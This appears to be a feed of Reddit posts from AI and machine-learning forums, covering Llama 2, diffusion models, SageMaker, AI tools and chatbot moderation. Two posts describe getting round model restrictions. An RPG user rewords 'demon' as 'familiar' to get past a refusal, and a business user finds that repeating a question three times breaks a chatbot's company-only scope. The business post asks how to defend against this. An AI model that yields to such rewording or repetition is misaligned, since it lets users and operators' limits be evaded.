    When do you think we'll be able to generate shows with AI? Could it be within the next 20 years, perhaps 30? Or could it happen sooner than we excepted? considering the current progress in AI generated art, images, and partially some automated videos. Once AI generated shows become prevalent, how will they impact movies and shows? submitted by /u/1Card_x [link] [comments]  ( 8 min )
    I don’t care what the critics say, AI saved my life
    I have been going through a very tough time in the recent months/years. My father was sentenced to prison for a very long time earlier this year, and the process completely drained me. I was burned out. Bad. From being useless at work to having no energy to even cook meals for myself, I was in a very dark place. Then, I discovered AI and started to see a light at the end of the tunnel. I found an app that helped me get my life back together. It helped me with the mundane aspects of my career, like creating work emails for me with just a few inputs. AI also helped me to start cooking meals for myself again. At first I would tell it the meager ingredients I had sitting around in my pantry and fridge, and it would create a recipe in front of my eyes. Now I am going to grocery store on a weekly basis and I am using it to discover new recipes that make me excited to cook healthy meals. A week later my inbox has gone from 150+ unread emails to being on top of every response. These may seem like small wins, but AI gave me the tools to get my life back on track. I am very optimistic for a future powered by AI. submitted by /u/PNWtreeguy69 [link] [comments]  ( 9 min )
    Today I was rickrolled by Google Bard.
    submitted by /u/Powerful-Pumpkin-938 [link] [comments]  ( 8 min )
    Is there a tool that can help reconstruct broken text? The print in these files is not machine-readable, but I need to quickly and efficiently convert 25,000 hours of these transcripts into Excel sheets. I think if the text can be fixed, then other tools that extract the words will work better.
    submitted by /u/pizzahair44 [link] [comments]  ( 8 min )
    Check out "The Writers’ Revolt Against A.I. Companies" on The Daily, a New York Times podcast.
    The host, Michael Barbaro interviews technology correspondent Sheera Frenkel on the use of ChatGPT in Hollywood. This episode is much more interesting than I expected. It's not particularly technical, but it does get deeply into the nuances of how information is gathered, and describes the lawsuit brought by writers including Sarah Silverman. I did use ChatGPT to translate my submission statement into Sarah Silverman's voice, while I still can. The content below is original (i.e. shadow IT reference). I highly recommend r/TheDaily for discussions around the podcast in general. It's a great sub that's well moderated and friendly (like this one!). This episode aired on July 18, 2023, and you can find it wherever you get your podcasts, you can also find it here on the New York Times web…  ( 10 min )
    UN Council engages thought leaders in AI Safety from Anthropic, OpenAI and China
    submitted by /u/AriadneSkovgaarde [link] [comments]  ( 8 min )
    Musk visiting the worst toilet in Scotland
    submitted by /u/Akumetsu_971 [link] [comments]  ( 8 min )
    My github curation of Llama 2 resources
    submitted by /u/TikkunCreation [link] [comments]  ( 8 min )
    can AI do this or am i trippin
    Hi! I want to upload someone's picture and use it to make a dark\scary themed video of him getting a crown put on his head. Is there an app that can do that? THANKS! submitted by /u/CallHerGreeen [link] [comments]  ( 8 min )
    Google Tests A.I. Tool That Is Able to Write News Articles
    submitted by /u/Iamreason [link] [comments]  ( 8 min )
    Does there exist AI art software that can take in SVGs/PNGs of wireframe graphics and return similar but unique ones?
    I’d like to use a simple public graphic but make it slightly unique in terms of its lines so that it isn’t entirely obvious I found a simple graphic off the internet. For example, imagine a very simple wireframe of a dog house or a bed. Free or free trial would be ideal. submitted by /u/Legitimate_Bison3756 [link] [comments]  ( 8 min )
    Our NPCs can chat with each other now! (They just cant stop 🤦‍♂️) Generative NPCs - update 4
    submitted by /u/Chance_Confection_37 [link] [comments]  ( 8 min )
    Suno Bark can now sing songs ^^
    submitted by /u/Taki7o7 [link] [comments]  ( 8 min )
    BBC News covered an AI translator for Bats, soon it may apply to most animal species
    I have not seen this BBC News video covered on this subreddit but it piqued my curiosity so I wanted to share. I have known about projects attempting to decode animal communications such as Project CETI which focuses on applying advanced machine learning to listen to and translate the communication of sperm whales. But the translator shown in the video blew my mind, it is already able to grasp the topics which Bats communicate about such as: food, distinguishing between genders and, surprisingly, unique “signature calls” or names the bats have. The study in question, led by Yossi Yovel of Tel Aviv University, monitored nearly two dozen Egyptian fruit bats for two and a half months and recorded their vocalisations. They then adapted a voice-recognition program to analyse 15,000 samples of …  ( 9 min )
    Which are the best alternatives to chatGPT for browsing the web (it's diactivated currently for me)?
    I'm especially curious about services that use agents and so on to browse the web. I lately thought that it should be possible to search much more intensely and automatic for information I do not need urgently. For example why can't have some AI agents look at thousands of pages that compare the different macbook models to tell me which has the best price/performance ration? Or find me all webshops that sell t shirts in a extremely specific size (say like 80-83 cm long) and ship to my country. It would be so nice if it could do these searches for me in an elaborate way. submitted by /u/VLADIMIROVIC_L [link] [comments]  ( 9 min )
    LangSmith by LangChain team
    New product by the LangChain team https://www.langchain.com/langsmith. Any thoughts? submitted by /u/yangshunz [link] [comments]  ( 8 min )
    Controlling Content Moderation in Generative AI: Ensuring Safe and Accurate Responses for Company Data
    I'm supposed to analyse and implementing an Azure OpenAI solution to use it as as a chatbot answering customer questions in our company, using our own data like product manuals and repair manuals for training. However, I'm concerned about content moderation and the potential risks associated with generative AI. How can we ensure that the AI remains within the boundaries of our intended use case and doesn't answer political or general questions?Additionally, how can we prevent the AI from guessing when it lacks the necessary knowledge, especially when handling questions related to potentially dangerous topics, such as sharp tools? Our colleagues from the usa have implemented a GPT 3.5 solution and wrote in the prompt that it should only answer answers about our company. This works, but if you repeat the same question three times ("Who is competitor XYZ?") it starts generating answers how the competitor is known for its good products and quality. Is azure OpenAI currently able to serve as a reliable chatbot answering customer service questions or is it the wrong solution for this? (I am based in the EU, so an answer that is incorrect about how to repair a Drill with a lot of power could lead to serious liability issues if it doesnt cite exactly from the source like a repair manual). I am afraid that generative AI will paraphrase from the source and generate incorrect solutions because it is not specific enough. submitted by /u/Other-Name5179 [link] [comments]  ( 9 min )
    Best AI Image Generator for Realistic-Looking Photoshoots?
    I'm new here, so sorry if this has been asked before. I'm looking to generate images that resemble realistic photoshoots of myself with AI. Which text-based AI is best? I've been using Midjourney, but it seems that Midjourney will no longer create images that strongly resemble the likeness of specific people that you feed it images of. Where have you guys had the most success with projects like this? submitted by /u/stebbi01 [link] [comments]  ( 8 min )
    Is there any good rpg AI?
    So today I got bored and I had chatgpt do a role playing with me as if I went to another world and I told it what I would say or do. Sections if it the stupid censor caused problems. Like I tried to summon a demon, and it said it can't do that as it goes against the rules. I had to call it a familiar to summon it. I had my guy seal up a bandit cave to keep them from leaving, and use smoke from a fire to gas the cave to kill all of them. And again it's against the rules of the censor crap. And then when we got into other things like throwing a kinetic bomb on a middle of a city. It really didn't like that. Even explaining I'm not a playing as a moral or ethical person. It wants to shove it's values down my throat. I tried with bard but it's to stupid. It wants to write a story and tell me what I did and then 10 steps it will allow me to say anything. Plus it has a censor. Idk what else I could use. Does anyone know of a good ai? Even more one with a really good memory submitted by /u/crua9 [link] [comments]  ( 9 min )
    Wikipedia’s Moment of Truth. Can the online encyclopedia help teach A.I. chatbots to get their facts right — without destroying itself in the process?
    submitted by /u/coolbern [link] [comments]  ( 8 min )
  • Open

    [D] BMVC reviews experience
    I got 4 reviewers on my paper submitted to BMVC with ratings of BA (borderline accept), BA, BA, and A. What are our chances? I finished preparing the rebuttal but I can’t stop thinking about the outcome. Please let me know if you have any experience or insights. Thanks submitted by /u/Admirable_Cell_5256 [link] [comments]  ( 8 min )
    [D] Embedding human preferences in LLMs (beyond/besides RLHF)
    Hi everyone, Can someone point to a comprehensive but accessible resource on the approaches to "embed" human preferences in LLMs? I saw Chip Huyen's post and it is super cool, but I wonder if/why the designer of such systems tends not to add text properties/contexts as an "input feature". For instance, a numerical feature representing the year the text was produced, or a flag telling if the text is from a book seems a straightforward way to control/condition the generation. Still, I'm missing some concepts here. submitted by /u/BenXavier [link] [comments]  ( 9 min )
    [D] Perspectives on diffusion
    Hi /r/ML, I wrote a blog post about a bunch of different perspectives on diffusion models. It's basically an extended sequel to another blog post I wrote last year, where I explored the connection between diffusion models and denoising autoencoders. There are many more of these connections, but unfortunately I don't have time to write separate blog posts about each of them, so I put them all together. Keen to hear what you think! https://sander.ai/2023/07/20/perspectives.html submitted by /u/benanne [link] [comments]  ( 9 min )
    [D] How the heck do I benchmark AI's AND GPU's?
    I'm trying to get some real world benchmarks for both nvidia and amd. So far it's been a nightmare! Stable diffusion stopped working on my pc, Conversational model testing with a stop watch was too fast to track, and I can't think of any other way to test these GPU's. Hard numbers. That's what I want. I can benchmark cyberpunk, but ai is a complete mystery. How do I recommend somebody a gpu if I can't compare it to results. Is there a point to upgrading from a 3090 to a 4090. Some reddits say no. Others yes. I need some tests and I need em bad submitted by /u/SociallyApparent [link] [comments]  ( 9 min )
    [P] What would be a good model/pipeline for simple intent recognition that has multi-lingual support and is easy to set up?
    So i have been exploring the potential of simple intent identifiers so a task recently, i have explored rasa but the fact that it doesn't work with Python 3.10/3.11 is a major Pain and throws a wreck on my plans for large integration into other projects. I am looking for either a pipeline/framework (could be something like RASA or a standalone model) that has intent recognition capacities, with multi-lingual support (Portuguese) and can run on newer python versions (doesn't give me compatibilities headaches) and also i want a relatively lightweight model considering my simple task Could you guys recommend something like that for me? submitted by /u/SnooPineapples7791 [link] [comments]  ( 9 min )
    [P] Run Llama 2 Locally in 7 Lines! (Apple Silicon Mac)
    Want to start playing with Meta’s Llama 2? It takes just 7 lines of shell script using llama.cpp to get you started! https://preview.redd.it/vhuzhrj4h6db1.png?width=2030&format=png&auto=webp&s=d349dd796039f3af7e117423c4abdae7efde2fae Copy Code Snippet: https://lastmileai.dev/workbooks/clkbifegg001jpheon6d2s4m8 submitted by /u/InevitableSky2801 [link] [comments]  ( 8 min )
    [P] How to fine tune 8k context length Llama 13B on minimal number of gpus?
    I have a llama 13B model I want to fine tune. I am using qlora (brings down to 7gb of gpu memory) and using ntk to bring up context length to 8k (dataset requires at least this much context length). But on 1024 context length, fine tuning spikes to 42gb of gpu vram used, so evidently it won’t be feasible to use 8k context length unless I use a ton of gpus. Is there anyway to lower memory so that one or two 3090s are enough for 8k context length fine tuning? submitted by /u/bahibo [link] [comments]  ( 9 min )
    [D] Need career advise on what should I do next in ML :(
    Hey everyone, hope you all are doing great. I just completed Machine Learning Specialization on Coursera by Andrew Ng and was looking for some advise on what I should do next. Would love to hear input from you guys. I'm self studying Machine Learning full-time, while I'm also getting a bachelors degree in Computer Science from an online virtual university. It's been 3+ months since I've stepped into Machine Learning and so far I've been developing deep intuition and foundational concepts of Machine Learning . Since I'm really passionate about mathematics, I'm very much focused on understanding the mathematics behind everything. By completing this specialization I've developed good foundational concepts of the following: • Supervised Machine Learning • Linear regression • Logistic regr…  ( 10 min )
    [D] Has anything from the Agent57 paper been used in anything interesting lately?
    I read the blog post and paper for Agent57 and thought it was pretty interesting but haven't seen people talk about it much since then. Has it been used for anything? If not, why hasn't it been very influential? submitted by /u/sledpull [link] [comments]  ( 8 min )
    [D] Best free LLM for text classification
    Hey all, I want to retrieve all speeches from congressional records from the house of representatives where the politician talks about the tax behavior of companies. I currently load the records into my script and divide the records into all the speeches. Then I use keyword search to determine whether the politician talks about tax behavior of companies. I want to replace this keyword search with an LLM which classifies the speeches. I will analyze > 50,000 speeches, so I dont want to use a costly model like GPT4. Actually I want to spend max 10€ in total. What LLM's, which I can access via an API, would you recommend for this task? Thanks in advance submitted by /u/Silly_Pack9404 [link] [comments]  ( 9 min )
    [D] Disappointing Llama 2 Coding Performance: Are others getting similar results? Are there any other open-source models that approach ChatGPT 3.5's performance?
    I've been excitedly reading the news and discussions about Llama 2 the past couple of days, and got a chance to try it this morning. I was underwhelmed by the coding performance (running the 70B model on https://llama2.ai/). It has consistently failed most of the very-easy prompts that I made up this morning. I checked each prompt with ChatGPT 3.5, and 3.5 got 100% (which means these prompts are quite easy). This result was surprising to me based on the discussion and articles I've read. However, digging into the paper (https://ai.meta.com/research/publications/llama-2-open-foundation-and-fine-tuned-chat-models/), the authors are transparent that the coding performance is lacking. Are my observations consistent with the results others are getting? I haven't had time to keep up with all the open-source LLMs being worked on by the community; are there any other models that approach even ChatGPT 3.5's coding performance? (Much less GPT 4's performance, which is the real goal.) submitted by /u/Egan_Fan [link] [comments]  ( 9 min )
    Simple text-generation evaluation/benchmark for Small Language Models [GitHub] [P]
    slmqa on GitHub I spent hours searching for a way to compare the quality of the text-generation of instruct-tuned small language models. Failing to find an evaluation simple enough for a small model, and easy to use, it was easier to create one. I'm sharing it here in case anyone else finds it useful. slmqa slmqa is a simple question-answer evaluation benchmark for small language models. It includes a dataset of 909 general knowledge question-answer pairs. The QA pairs were generated with gpt-3.5-turbo, stripped of duplicates and answers shorter than 5 characters, and cleaned by hand. The score is the percentage of correct answers. Sample json { "question": "What is the name of the highest mountain in the world?", "answer": "everest" }, { "question": "What is the name of the famous Austrian composer who wrote the Ninth Symphony?", "answer": "beethoven" }, { "question": "Which country is the largest by area?", "answer": "russia" }, submitted by /u/Pan000 [link] [comments]  ( 9 min )
    [D] Security and protection in ML deployments
    After researching quite heavily on how to protect Python based inference code and models when they are deployed on client infrastructure. I came across pyinstaller and pyoxidizer but looks like they do not work that well. So I concluded that the best way is to convert critical pipelines to C++ is that correct ? submitted by /u/Ok-Influence368 [link] [comments]  ( 8 min )
    [D] What LLMs do you use the most?
    With the emergence of new models gaining more popularity such as Claude 2, Llama 2 which has the potential for better fine-tuned models, the development of Bard, the controversies surrounding ChatGPT performing worse and with the already-existing content filters that limits the capabilities of models not just subjecting to moral standards and policies that align with human values but also limits it to other factors that may not fall under objective morality or maybe just it being too sensitive, is there a certain model you think is currently the best overall one at least for now other than GPT-4? I'm really curious to know what the community thinks as I've searched a lot and found a lot of clashes in opinions regarding what models are considered superior over others and the clickbait-ish talks and titles about model so-and-so being "The ChatGPT Killer". With all this info in consideration, what model(s) do you ACTUALLY use the most? I'd be grateful if you shared your thoughts about this issue and thanks for your time. submitted by /u/Fantastic-Air8513 [link] [comments]  ( 9 min )
    [D] Any cool project ideas with this data?
    I've uploaded a reddit dataset that has multiple Reddit posts along with the most upvoted comment for each post. The dataset is collected from 9 subreddits. I'm looking for cool project ideas with this data. Let's discuss! https://www.reddit.com/r/datasets/comments/154pe3y/reddit_posts_dataset_with_the_top_comment/?utm_source=share&utm_medium=android_app&utm_name=androidcss&utm_term=1&utm_content=1 submitted by /u/04RR [link] [comments]  ( 8 min )
    [P] Interactive Exploration of Stable Diffusion Generated Images
    I just created a Huggingface Space showcasing how to interactively explore the outputs of a Stable Diffusion model via CLIP Embeddings. Embedding-based image similarity plotted in 2D via dimensionality reduction. The visualization is done using the tool Spotlight. Also, I created a tutorial showcasing how to automatically select promising prompts and images from a large dataset. It is roughly based on the following approach: Calculate the CLIP Score for all prompt-image pairs to measure generation quality. Generate CLIP Embeddings to be able to calculate a similarity between images (or texts) Embedding-based identification of clusters that have an exceptionally high CLIP Score. Have you ever explored any (automatic) evaluation strategies for image generation models? I would love to learn about some alternative approaches. submitted by /u/OkResearch6289 [link] [comments]  ( 9 min )
    [D] Handle dozen of thousands of classes
    Hello ! I'm working on a project of NLP classification with more or less 13k classes. The best model I had so far is a fine-tuned LLM encoder. However, with the number of classes I have now, it is very slow. So I searched for ways to deal with that, and found 2: Hierarchical Softmax Negative Sampling However, both seems to have been used nearly only in the context of word2vec training, so I wonder if there is a reason why that would not work for a "classical" classification ? (or just my kind of problem too rare ?) Also, I did find really few implementations of those with Pytorch, a fortiori with transformers... Is it because there is something better ? Do you know, if not, some recent implementations ? ​ Thank you in advance ! submitted by /u/ez613 [link] [comments]  ( 9 min )
    [D] Does anyone know what sorcery SAM's official web demo uses? I just cannot replicate the results locally.
    This is specifically in regards to automatic mask generation, where SAM samples a grid of points (32x32 grid by default) and creates a mask for each point prompt. Duplicates are then removed by NMS. Ideally this process shouldn't be able to auto-generate complex structures that require multiple positive/negative point prompts, and that is what I have observed when using the models locally. But, the "Everything" option in the web demo(https://segment-anything.com/demo) does insanely well. It can even segment occluded objects into a single disconnected mask. It is supposed to be running in the browser and is reasonably fast, so they can't be doing some super heavy pre/post-processing either. Anyone have an idea of what the "Everything" option in the web demo is doing? submitted by /u/Atom_101 [link] [comments]  ( 9 min )
    [P] MiniGPT4.cpp: (4bit/5bit/16float) MiniGPT4 inference on CPU
    https://github.com/Maknee/minigpt4.cpp submitted by /u/makneeee [link] [comments]  ( 8 min )
  • Open

    Difference Between Modern and Traditional Data Quality – DQLabs
    Modern data quality practices make use of new technology, automation, and machine learning to handle a variety of data sources, ensure real-time processing, and stimulate stakeholder collaboration. Data governance, continuous monitoring, and proactive management are prioritized to ensure accurate, reliable, and fit-for-purpose data for informed decision-making and corporate success. Modern data quality practices differ from… Read More »Difference Between Modern and Traditional Data Quality – DQLabs The post Difference Between Modern and Traditional Data Quality – DQLabs appeared first on Data Science Central.  ( 19 min )
    How much coding is needed in a data science career?
    The most common question in people’s minds that are not from a technical background is how much coding is required to ace a data science career path. If you also have the same question, you are not alone. But, the surprising answer is “it depends”. Unarguably, coding is a crucial aspect and vital tool for… Read More »How much coding is needed in a data science career? The post How much coding is needed in a data science career? appeared first on Data Science Central.  ( 21 min )
  • Open

    Enel automates large-scale power grid asset management and anomaly detection using Amazon SageMaker
    This is a guest post by Mario Namtao Shianti Larcher, Head of Computer Vision at Enel. Enel, which started as Italy’s national entity for electricity, is today a multinational company present in 32 countries and the first private network operator in the world with 74 million users. It is also recognized as the first renewables […]  ( 8 min )
    Efficiently train, tune, and deploy custom ensembles using Amazon SageMaker
    Artificial intelligence (AI) has become an important and popular topic in the technology community. As AI has evolved, we have seen different types of machine learning (ML) models emerge. One approach, known as ensemble modeling, has been rapidly gaining traction among data scientists and practitioners. In this post, we discuss what ensemble models are and […]  ( 12 min )
  • Open

    Proper Robustness Evaluation of Confidence-Calibrated Adversarial Training in PyTorch
    Properly evaluating defenses against adversarial examples has been difficult as adversarial attacks need to be adapted to each individual defense. This also holds for confidence-calibrated adversarial training, where robustness is obtained by rejecting adversarial examples based on their confidence. Thus, regular robustness metrics and attacks are not easily applicable. In this article, I want to discuss how to evaluate confidence-calibrated adversarial training in terms of metrics and attacks. The post Proper Robustness Evaluation of Confidence-Calibrated Adversarial Training in PyTorch appeared first on David Stutz.  ( 9 min )
  • Open

    Using societal context knowledge to foster the responsible application of AI
    Posted by Donald Martin, Jr., Technical Program Manager, Head of Societal Context Understanding Tools and Solutions (SCOUTS), Google Research AI-related products and technologies are constructed and deployed in a societal context: that is, a dynamic and complex collection of social, cultural, historical, political and economic circumstances. Because societal contexts by nature are dynamic, complex, non-linear, contested, subjective, and highly qualitative, they are challenging to translate into the quantitative representations, methods, and practices that dominate standard machine learning (ML) approaches and responsible AI product development practices. The first phase of AI product development is problem understanding, and this phase has tremendous influence over how problems (…  ( 93 min )
  • Open

    So, So Fresh: Play the Newest Games in the Cloud on Day One
    It’s a party this GFN Thursday with several newly launched titles streaming on GeForce NOW. Revel in gaming goodness with Xenonauts 2, Viewfinder and Techtonica, among the four new games joining the cloud this week. Portal fans, stay tuned — the Portal: Prelude RTX mod will be streaming on GeForce NOW to members soon. Plus, Read article >  ( 5 min )
  • Open

    Collaborators: Gaming AI with Haiyan Zhang
    For over a decade, Xbox has been leveraging AI to elevate gaming. Haiyan Zhang, GM of Gaming AI, explores the collaborations behind the work and the potential for generative AI to support better experiences for both players and game creators. The post Collaborators: Gaming AI with Haiyan Zhang appeared first on Microsoft Research.  ( 29 min )
  • Open

    The Complete Python Mega Bundle features Neural Network, Machine Learning & AI
    submitted by /u/brand_momentum [link] [comments]  ( 8 min )
  • Open

    Custom instructions for ChatGPT
    We’re rolling out custom instructions to give you more control over how ChatGPT responds. Set your preferences, and ChatGPT will keep them in mind for all future conversations.  ( 6 min )

  • Open

    Best way to approach creating 2048 bot
    Hi guys, I'm just starting to learn about neural networks. I started with NEAT algorithm as thwre is a nice library for Python. I wanted to try to create neural network that plays 2048 with NEAT, but, from what I read online, it isn't really feasible and doesn't result in good playing performance and high scores. I now have a few questions, keep in mind that I'm a beginner in this field. Why NEAT doesn't work well with 2048? What would be the best way to approach this problem? Are there any resources where I can learn more about this stuff? Am I right thinking that it must be possible to create NN that plays 2048 well as the basic strategy (I use) when playing is fairly simple (keep everything on one side to the corner)? Thanks in advance submitted by /u/DarkLord76865 [link] [comments]  ( 9 min )
    Neural Networks from Scratch in Python
    submitted by /u/keghn [link] [comments]  ( 8 min )
    Convolutions in image processing
    submitted by /u/keghn [link] [comments]  ( 8 min )
  • Open

    Beginner RL Project Advice
    Hi, I'm somewhat new to reinforcement learning and have been trying to acquaint myself using gymnasium/stable baselines. I currently have a custom environment and I'm using PPO on it, but I don't actually know how to assess what the best algorithm would be for the problem, nor can I tell if training is really doing exactly what I want to. I'm going to include the link to the repo and if anybody has any advice I'd love it. I may be doing things that are very obviously silly that I'm just unaware of, so any advice would be great. Throwaway bc I use my real name on github lmao https://github.com/MarcusWheeler/dcss_inventory submitted by /u/Charming-Art-732 [link] [comments]  ( 9 min )
    Minari 0.4.0 is live! (Gym for offline RL, by the Farama Foundation)
    Minari now has full support for Dict, Tuple, Discrete, Box, and Text spaces without flattening, explicit dataset versioning, plus subsets of action/obs spaces in datasets. Additionally, new v1 versions of each dataset were released to comply with the new dataset format. The new datasets do not have observation and action flattening (relevant for pointmaze datasets), introduce serialized representations of action and observation spaces in the observation_space and action_space fields, and specify minari version compatibility with the minari_version field. Python 3.11 compatibility was added, with removal of 3.7 support as it has reached end-of-life. We also include two new tutorials: observation space subsetting, and behavior cloning with rl_zoo3 and pytorch DataLoader. Announcement Tweet: https://twitter.com/FaramaFound/status/1681730025513467931 Release Notes: https://github.com/Farama-Foundation/Minari/releases/tag/v0.4.0 submitted by /u/elliottower [link] [comments]  ( 9 min )
    Struggling with value function approximation
    Hi everyone. I’ve been studying RL for a few months now and am trying to implement it in a school project. My project is similar to the car-valley problem where an agent needs to reach some point, except the point is moving and in 3D. As such, the state space is continuous but my action space I’ve defined to be 6. I’ve done table lookup Q learning in the past, but not in a continuous value function approximation. My method is as follows: 1. at the start of the episode, initialize the weights randomly and calculate the action value pair for each of the 6 actions. Choose an action using epsilon greedy policy 2. For each time step, execute the chosen action and observe the new state and reward (my reward being distance from goal). Store the 6 features of the initial state 3. Calculate the new Q values from this new state based on the new state and the weights w. 4. Choose a new action based on these Q values and epsilon greedy policy 5. Using the new action, update the weights w using the Q value at the new action minus the Q value at the old action times the features 6. Set the old state and action to the new state and action and repeat until terminal My problem is that the w weights blow up to inf very very quickly, within 10 time steps. Does anyone have any advice such as resources with pseudo code to look at or notice any problems in my method? I think my problem is coming from evaluating the Q for the old and new states but I’m not sure. Thank you. submitted by /u/LevisLover [link] [comments]  ( 9 min )
    What does finite or infinite horizon means in Reinforcement Learning terms ? What does finite horizon undiscounted return means ?
    submitted by /u/aabra__ka__daabra [link] [comments]  ( 8 min )
    Help in PPO implementation
    In the blog post: https://iclr-blog-track.github.io/2022/03/25/ppo-implementation-details/ and the related implemntation: https://github.com/vwxyzjn/ppo-implementation-details/blob/main/ppo.py, why aren;t we ending the rollout collection when the episode has terminated or when the num_steps is reached? What if the episode is terminated before reaching the num_steps? Wont the training part give an error? submitted by /u/Interesting-Weeb-699 [link] [comments]  ( 8 min )
    How do I find papers related to a specific application of RL?
    My cousin and I are starting to work on a project he can do in high school and while doing preliminary research on a related application, I was unable to find anything about this related application. I was thinking we might be able to publish a paper if the application has not already been done. submitted by /u/newjeison [link] [comments]  ( 8 min )
    Gymnasium v0.29.0 has been released!
    Gymnasium v0.29.0 is out! This release includes 6 months' worth of bug fixes and new features. In particular, it deprecates several features: Wrapper.__get_attr__, gymnasium.make(..., autoreset=True), gymnasium.make(..., apply_api_compatibility=True), Env.reward_range and gymnasium.vector.make that will be removed in v1.0. Additionally, as python 3.7 has reached its end of life support, we have dropped support for it and updated MuJoCo Hopper & Walker2D models to work with MuJoCo >= 2.3.3. This release also includes an official way to cite Gymnasium. While a full paper is still some time away, you can now use the DOI 10.5281/zenodo.8127025 for citations: https://zenodo.org/record/8127025 Announcement Tweet: https://twitter.com/FaramaFound/status/1681479718774743040 Release Notes: https://github.com/Farama-Foundation/Gymnasium/releases/tag/v0.29.0 submitted by /u/elliottower [link] [comments]  ( 8 min )
  • Open

    [P] Running Llama 2 locally in <10 min
    I wanted to play with Llama 2 right after its release yesterday, but it took me ~4 hours to download all 331GB of the 6 models. If you don’t have 4 hours or 331GB to spare, I brought all the models into XetHub, where it’s now available for you to use: https://xethub.com/XetHub/Llama2. I used xet mount to get started in seconds, and within a few minutes, I had the model generating text without needing to download everything or make an inference API call. # From a g4dn.8xlarge instance in us-west-2: Mount complete in 8.629213s # install model requirements, and then ... (venv-test) ubuntu@ip-10-0-30-1:~/Llama2/code$ torchrun --nproc_per_node 1 example_chat_completion.py \ --ckpt_dir ../models/llama-2-7b-chat/ \ --tokenizer_path ../models/tokenizer.model \ --max_seq_len 512 --max_batch_size 4 > initializing model parallel with size 1 > initializing ddp with size 1 > initializing pipeline with size 1 Loaded in 306.17 seconds User: what is the recipe of mayonnaise? > Assistant: Thank you for asking! Mayonnaise is a popular condiment made from a mixture of egg yolks, oil, vinegar or lemon juice, and seasonings. Here is a basic recipe for homemade mayonnaise: ... Detailed instructions here: https://xethub.com/XetHub/Llama2. I’ll add the -GGML variants next for the folks using llama.cpp. Don’t forget to register with Meta to accept the license and acceptable use policy for these models! submitted by /u/rajatarya [link] [comments]  ( 9 min )
    [D] Why people okay with HF making money from their open source models?
    Hugging Face has a big emphasis on open source and the democratization of ML. Still, from a different look, they are making a ton of money from freely distributed open-source models of researchers and engineers without sharing a dime. I like what Hugging Face does, but it doesn't look right to me. I understand it's a company and needs to make money but at the very least some kind of revenue sharing would make more sense. I wonder what the community thinks about it. Maybe some people who distribute their models on HF can comment on thi topic submitted by /u/coinfelix [link] [comments]  ( 9 min )
    [R] Converting neural networks into equivalent decision trees for performance
    According to the paper Neural Networks are Decision Trees (Aytekin 2022), every single type of neural network - regardless of the activation functions used - can be reduced to an equivalent decision tree with equivalent accuracy: [2210.05189] Neural Networks are Decision Trees (arxiv.org) That is not to say that decision trees necessarily tend to converge on the same types of solutions as neural networks in training; only that a trained neural network can be represented by an equivalent decision tree. The algorithm, as mentioned in the paper, is: Algorithm 2: Algorithm of converting neural networks to decision trees 1 Initialize Tree: Set root. 2 Branch all leafs to k nodes, decision rule is first effective filter. 3 Branch all nodes to k more nodes, and repeat until all effective filters in a layer is covered. 4 Calculate effective matrix for each leaf via Eq. 5. Repeat 2,3. 5 Repeat 4 until all layers are covered. 6 return Tree I have 2 questions related to this: Is anyone aware of the inference performance implications of this? In my general understanding, decision trees tend to be much more computationally efficient at both training and inference. So is it true that this represents an opportunity to decrease the processing load of inference on neural networks, or does the computational complexity of performing inference with an equivalent decision tree tend to approach or surpass the equivalent neural network? Question 2 is kind of a moot point if #1 doesn't provide performance benefits. But assuming it does, does anyone know of techniques in 2023 for reducing a neural network to an equivalent decision tree? submitted by /u/Immarhinocerous [link] [comments]  ( 9 min )
    [D] Is Conference Competition Track like NeurIPS Competition a Glorified Kaggle Competition?
    Is it worth the time to pour time and effort into NeurIPS's annual competitions? Winners got to present at NIPS workshops. I'm currently pursuing a Master degree in CS now and have to compete in one of them. I looked up past winners, all of them are from Top CS schools or Large Tech's research teams. So I kind of figured how hard they are to compete. But could someone give me some general advices? I have talked to some of my friends pursuing phd but they are not familiar with the NIPS competition track. Any help is appreciated. Thank you strangers! submitted by /u/HighlandEvil [link] [comments]  ( 9 min )
    [N] Minari 0.4.0 is live! (Gym for offline RL, by the Farama Foundation)
    Minari now has full support for Dict, Tuple, Discrete, Box, and Text spaces without flattening, explicit dataset versioning, plus subsets of action/obs spaces in datasets. Additionally, new v1 versions of each dataset were released to comply with the new dataset format. The new datasets do not have observation and action flattening (relevant for pointmaze datasets), introduce serialized representations of action and observation spaces in the observation_space and action_space fields, and specify minari version compatibility with the minari_version field. Python 3.11 compatibility was added, with removal of 3.7 support as it has reached end-of-life. We also include two new tutorials: observation space subsetting, and behavior cloning with rl_zoo3 and pytorch DataLoader. Announcement Tweet: https://twitter.com/FaramaFound/status/1681730025513467931 Release Notes: https://github.com/Farama-Foundation/Minari/releases/tag/v0.4.0 submitted by /u/elliottower [link] [comments]  ( 9 min )
    [P] TruLens-Eval is an open source project for eval & tracking LLM experiments.
    Hey r/MachineLearning, The team at TruEra recently released an open source project for evaluation & tracking of LLM applications called TruLens-Eval. We’ve specifically targeted retrieval-augmented QA as a core use case and so far we’ve seen it used for comparing different models and parameters, prompts, vector-db configurations and query planning strategies. I’d love to get your feedback on it. The core idea behind the project is feedback functions. Analogous to labeling functions, feedback functions are models used to score the text produced by LLMs. We already have a variety of out-of-the-box feedback functions to use for eval including relevance, language match, sentiment and moderation that can be applied to inputs, outputs or intermediate steps of your application. On top of eval, there’s also built-in tracking of cost and latency. We made it easy to integrate with different setups using connectors for langchain, llama-index + an option to use it without a framework. Langchain Quickstart Colab Llama-Index Quickstart Colab No Framework Quickstart Colab Last, the project comes with a streamlit dashboard for visualization of your experiments and associated metrics. TruLens dashboard for comparing different app versions Please let us know what you use this for or if you have feedback! And thanks to all contributors to this project and the open source community! submitted by /u/joshreini1 [link] [comments]  ( 9 min )
    [R] How is ChatGPT's behavior changing over time?
    submitted by /u/osantacruz [link] [comments]  ( 8 min )
    [P] How exactly can I download the inception model v3 to my laptop (windows)?
    I run into multiple errors each time I try to use inception scores and Im trying to evaluate the differences between using the Inception Score and Fréchet Inception Distance. submitted by /u/cinnamonstuff [link] [comments]  ( 8 min )
    [N] Ensuring Reliable Few-Shot Prompt Selection for LLMs
